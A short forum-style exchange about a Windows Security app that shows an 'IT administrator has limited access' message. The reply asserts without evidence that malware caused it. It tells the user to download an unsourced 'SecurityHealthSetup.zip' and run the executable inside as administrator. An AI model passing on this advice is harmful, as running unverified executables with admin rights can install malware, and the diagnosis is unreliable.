Windows security blank screen.

Last night it was working just find today I woke up and can't access windows security. It says "Page not available Your IT administrator has limited access to some areas of this app, and the item you tried to access in not available. contact IT helpdesk for more information" First of all what is IT administrator ? and IT helpdesk makes no sense. I did all the tutorials that I found but non of them fix my problem.

    In simple words, a malware just disabled Windows Security app. The following will help.

    Download SecurityHealthSetup.zip

    Unzip SecurityHealthSetup.exe, then right click and run as administrator.

    If it's not working straight away, restart the computer and give the system a few minutes to initialize before checking Windows Security.
